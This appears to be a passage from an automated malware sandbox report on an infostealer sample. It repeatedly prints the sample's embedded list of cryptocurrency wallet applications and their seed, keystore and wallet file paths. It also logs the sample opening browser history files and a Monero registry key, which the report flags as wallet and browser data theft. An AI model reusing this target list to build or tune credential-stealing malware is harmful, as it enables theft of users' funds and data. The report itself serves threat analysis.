Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\seed.seco*
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\info.secon
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\seed.seco*
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\.z
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\seed.seco*
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\seed.seco*
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
